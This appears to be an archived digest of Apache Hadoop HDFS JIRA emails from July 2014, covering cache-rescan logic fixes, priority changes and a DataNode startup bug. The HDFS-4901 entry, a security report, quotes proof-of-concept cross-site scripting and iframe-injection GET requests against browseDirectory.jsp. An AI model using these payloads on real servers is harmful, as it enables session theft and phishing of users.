> long delta = (startTimeMs + intervalMs) - curTimeMs;
> if (delta <= 0) {
>   LOG.info("Rescanning after " + (curTimeMs - startTimeMs) +
>   " milliseconds");
>   break;
> }
> doRescan.await(delta, TimeUnit.MILLISECONDS);
> curTimeMs = Time.monotonicNow();
>   }
> {code}



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6786) Fix potential issue of cache refresh interval

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6786?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081513#comment-14081513
 ] 

Colin Patrick McCabe commented on HDFS-6786:


I agree with Andrew that a minimum interval seems unnecessary here.  Sysadmins 
rarely adjust this value, and if they do, we assume that they know what they're 
doing... similar to a lot of the other tunables.

The only case I can recall where we set a minimum is in block size.  But we did 
that because block size can be controlled by the client creating a file (you 
don't need to be the sysadmin adjusting a configuration to set the block size).

I'm going to close this one out since it's working as intended.

> Fix potential issue of cache refresh interval
> -
>
> Key: HDFS-6786
> URL: https://issues.apache.org/jira/browse/HDFS-6786
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: caching
>Affects Versions: 2.4.0
>Reporter: Yi Liu
>Assignee: Yi Liu
>
> In {{CacheReplicationMonitor}}, following code is try to check whether needs 
> to rescan every interval ms, if rescan takes n ms, then subtract n ms for the 
> interval. But if the delta <=0, it breaks and start rescan, there will be 
> potential issue: if user set the interval to a small value or rescan finished 
> after a while exceeding the interval, then rescan will happen in loop. 
> Furthermore, {{delta <= 0}} trigger the rescan should not be the intention, 
> since if needs rescan, {{needsRescan}} will be set.
> {code}
>  while (true) {
> if (shutdown) {
>   LOG.info("Shutting down CacheReplicationMonitor");
>   return;
> }
> if (needsRescan) {
>   LOG.info("Rescanning because of pending operations");
>   break;
> }
> long delta = (startTimeMs + intervalMs) - curTimeMs;
> if (delta <= 0) {
>   LOG.info("Rescanning after " + (curTimeMs - startTimeMs) +
>   " milliseconds");
>   break;
> }
> doRescan.await(delta, TimeUnit.MILLISECONDS);
> curTimeMs = Time.monotonicNow();
>   }
> {code}



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6784) Avoid rescan twice in HDFS CacheReplicationMonitor for one FS Op if it calls setNeedsRescan multiple times.

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6784?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081506#comment-14081506
 ] 

Colin Patrick McCabe commented on HDFS-6784:


I thought about this a little more, and I posted a patch on HDFS-6783 that I 
think solves this problem.  Check it out.

Sorry for all the confusion... sometimes it's tough to reason about these 
locking issues.

> Avoid rescan twice in HDFS CacheReplicationMonitor for one FS Op if it calls 
> setNeedsRescan multiple times.
> ---
>
> Key: HDFS-6784
> URL: https://issues.apache.org/jira/browse/HDFS-6784
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: caching
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6784.001.patch
>
>
> In HDFS CacheReplicationMonitor,  rescan is expensive. Sometimes, 
> {{setNeedsRescan}} is called multiple times, for example, in 
> FSNamesystem#modifyCacheDirective, there are 3 times. In monitor thread of 
> CacheReplicationMonitor, if it checks {{needsRescan}} is true, rescan will 
> happen, but {{needsRescan}} is set to false before real scan. Meanwhile, the 
> 2nd or 3rd time {{setNeedsResacn}} may set {{needsRescan}} to true. So after 
> the scan finish, in next loop, a new rescan will be triggered, that's not 
> necessary at all and inefficient for rescan twice. 



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6783) Fix HDFS CacheReplicationMonitor rescan logic

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6783?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081502#comment-14081502
 ] 

Colin Patrick McCabe commented on HDFS-6783:


Hi Yi.

I didn't like v2 of the patch since I felt like 2 and 1 were magic numbers, not 
obvious when reading the code.  I also feel like having all these flags and 
conditions and suchlike is kind of brittle.

I would rather just have three numbers: the number of the last completed scan, 
the number of the scan in progress, and the number of the next scan that has 
been requested.  The nice thing about this approach is that if we call 
{{setNeedsRescan}} multiple times in a row during the same scan, it just keeps 
setting {{neededScanCount}} to the same value.  This also doesn't make any 
assumptions about whether we hold the FSN lock for the entire duration of  
{{CacheReplicationMonitor#rescan}}.

I posted a v3 of the patch that implements this.  I think this also solves the 
issue in HDFS-6784.

I apologize for posting my patch on your JIRA but I really felt like this was 
an awesome solution.  Let me know what you think!

> Fix HDFS CacheReplicationMonitor rescan logic
> -
>
> Key: HDFS-6783
> URL: https://issues.apache.org/jira/browse/HDFS-6783
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: caching
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6783.001.patch, HDFS-6783.002.patch, 
> HDFS-6783.003.patch
>
>
> In monitor thread, needsRescan is set to false before real scan starts, so 
> for {{waitForRescanIfNeeded}} will return for the first condition:
> {code}
> if (!needsRescan) {
>   return;
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-4901) Site Scripting and Phishing Through Frames in browseDirectory.jsp

2014-07-31 Thread Allen Wittenauer (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-4901?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081493#comment-14081493
 ] 

Allen Wittenauer commented on HDFS-4901:


At this point, there is unlikely to be another 1.x release, given the last one 
will be a year ago tomorrow.

> Site Scripting and Phishing Through Frames in browseDirectory.jsp
> -
>
> Key: HDFS-4901
> URL: https://issues.apache.org/jira/browse/HDFS-4901
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: security, webhdfs
>Affects Versions: 1.2.1
>Reporter: Jeffrey E  Rodriguez
>Assignee: Vivek Ganesan
>Priority: Blocker
> Attachments: HDFS-4901.patch, HDFS-4901.patch.1, 
> HDFS-4901_branch-1.2.patch
>
>   Original Estimate: 24h
>  Time Spent: 24h
>  Remaining Estimate: 0h
>
> It is possible to steal or manipulate customer session and cookies, which 
> might be used to impersonate a legitimate user,
> allowing the hacker to view or alter user records, and to perform 
> transactions as that user.
> e.g.
> GET /browseDirectory.jsp? dir=%2Fhadoop'"/>alert(759) 
> &namenodeInfoPort=50070
> Also;
> Phishing Through Frames
> Try:
> GET /browseDirectory.jsp? 
> dir=%2Fhadoop%27%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fdemo.testfire.net%2Fphishing.html%3E
> &namenodeInfoPort=50070 HTTP/1.1
> Cookie: JSESSIONID=qd9i8tuccuam1cme71swr9nfi
> Accept-Language: en-US
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-4916) DataTransfer may mask the IOException during block transfering

2014-07-31 Thread Allen Wittenauer (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-4916?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Allen Wittenauer updated HDFS-4916:
---

Priority: Critical  (was: Blocker)

> DataTransfer may mask the IOException during block transfering
> --
>
> Key: HDFS-4916
> URL: https://issues.apache.org/jira/browse/HDFS-4916
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.0.4-alpha, 2.0.5-alpha
>Reporter: Zesheng Wu
>Priority: Critical
> Attachments: 4916.v0.patch
>
>
> When a new datanode is added to the pipeline, the client will trigger the 
> block transfer process. In the current implementation, the src datanode calls 
> the run() method of the DataTransfer to transfer the block, this method will 
> mask the IOExceptions during the transfering, and will make the client not 
> realize the failure during the transferring, as a result the client will 
> mistake the failing transferring as successful one. 



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-5185) DN fails to startup if one of the data dir is full

2014-07-31 Thread Allen Wittenauer (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-5185?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Allen Wittenauer updated HDFS-5185:
---

Priority: Critical  (was: Blocker)

> DN fails to startup if one of the data dir is full
> --
>
> Key: HDFS-5185
> URL: https://issues.apache.org/jira/browse/HDFS-5185
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Reporter: Vinayakumar B
>Assignee: Vinayakumar B
>Priority: Critical
> Attachments: HDFS-5185.patch
>
>
> DataNode fails to startup if one of the data dirs configured is out of space. 
> fails with following exception
> {noformat}2013-09-11 17:48:43,680 FATAL 
> org.apache.hadoop.hdfs.server.datanode.DataNode: Initialization failed for 
> block pool Block pool  (storage id 
> DS-308316523-xx.xx.xx.xx-64015-1378896293604) service to /nn1:65110
> java.io.IOException: Mkdirs failed to create 
> /opt/nish/data/current/BP-123456-1234567/tmp
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.BlockPoolSlice.(BlockPoolSlice.java:105)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsVolumeImpl.addBlockPool(FsVolumeImpl.java:216)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsVolumeList.addBlockPool(FsVolumeList.java:155)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsDatasetImpl.addBlockPool(FsDatasetImpl.java:1593)
> at 
> org.apache.hadoop.hdfs.server.datanode.DataNode.initBlockPool(DataNode.java:834)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPOfferService.verifyAndSetNamespaceInfo(BPOfferService.java:311)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPServiceActor.connectToNNAndHandshake(BPServiceActor.java:217)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPServiceActor.run(BPServiceActor.java:660)
> at java.lang.Thread.run(Thread.java:662)
> {noformat}
> It should continue to start-up with other data dirs available.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6783) Fix HDFS CacheReplicationMonitor rescan logic

2014-07-31 Thread Colin Patrick McCabe (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6783?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Colin Patrick McCabe updated HDFS-6783:
---

Attachment: HDFS-6783.003.patch

> Fix HDFS CacheReplicationMonitor rescan logic
> -
>
> Key: HDFS-6783
> URL: https://issues.apache.org/jira/browse/HDFS-6783
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: caching
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6783.001.patch, HDFS-6783.002.patch, 
> HDFS-6783.003.patch
>
>
> In monitor thread, needsRescan is set to false before real scan starts, so 
> for {{waitForRescanIfNeeded}} will return for the first condition:
> {code}
> if (!needsRescan) {
>   return;
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.2#6252)


  1   2   >